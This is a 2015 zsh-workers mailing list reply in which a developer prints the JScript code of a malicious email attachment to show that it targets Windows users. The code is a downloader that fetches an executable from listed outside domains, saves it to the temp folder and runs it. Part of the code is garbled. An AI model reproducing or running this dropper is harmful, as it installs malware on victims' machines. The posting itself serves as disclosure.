Zsh Mailing List Archive Messages sorted by: Reverse Date, Date, Thread, Author

Re: zsh-workers/37266 has a malicious attachment

X-seq: zsh-workers 37269
From: Markus Trippelsdorf <markus@xxxxxxxxxxxxxxx>
To: Peter Stephenson <p.stephenson@xxxxxxxxxxx>
Subject: Re: zsh-workers/37266 has a malicious attachment
Date: Tue, 1 Dec 2015 14:13:27 +0100
Cc: Zsh Hackers' List <zsh-workers@xxxxxxx>
Dkim-signature: v=1; a=rsa-sha256; c=simple; d=mail.ud10.udmedia.de; h= date:from:to:cc:subject:message-id:references:mime-version :content-type:in-reply-to; s=beta; bh=Ah1W/zOKZnvhL8mkWLqftwlaT0 ZZTti7zGU8be/N0HM=; b=F+2p3PI34bzBI6fVCrHIcC76fnxmYtTk3DKE235aq/ fijikeYQfMoAU/T8eWboGlGZBuZOv43liI6gF3R4MEgf/A0hlsIKBXRocxNMQx7t 0S0wecybWE6BcR4q6KiU2zncqdML3vtn5jqiI4PTj1uiZt4ifL6uFUJ4ZCB+0J12 Y=
In-reply-to: <20151201122412.7d355172@pwslap01u.europe.root.pri>
List-help: <mailto:zsh-workers-help@zsh.org>
List-id: Zsh Workers List <zsh-workers.zsh.org>
List-post: <mailto:zsh-workers@zsh.org>
Mailing-list: contact zsh-workers-help@xxxxxxx; run by ezmlm
References: <20151201122412.7d355172@pwslap01u.europe.root.pri>

On 2015.12.01 at 12:24 +0000, Peter Stephenson wrote:
> ...probably obvious enough to everyone here, but as it got flagged up by
> our email system I thought it was worth reporting more widely.
> Subject line is "Your e-ticket #0000228935".

Only Windows users are attacked. Here is the code:

var b = "itechgalaxyapps.com mybeautypedia.com kindernestmumbai.com".split(" ");
var ws = WScript.CreateObject("WScript.Shell");
var fn = ws.ExpandEnvironmentStrings("%TEMP%") + String.fromCharCode(92) + "750083";
var xo = WScript.CreateObject("MSXML2.XMLHTTP");
var xa = WScript.CreateObject("ADODB.Stream");
var ld = 0;
for (var n = 1; n <= 3; n++) {
    for (var i = ld; i 1000) {
        dn = 1;
        xa.position = 0;
        xa.saveToFile(fn + n + ".exe", 2);
        try {
            ws.Run(fn + n + ".exe", 1, 0);
        } catch (er) {};
    };
    xa.close();
};
if (dn == 1) {
    ld = i;
    break;
};
} catch (er) {};
};
};

-- 
Markus

References:
- zsh-workers/37266 has a malicious attachment
  - From: Peter Stephenson

Messages sorted by: Reverse Date, Date, Thread, Author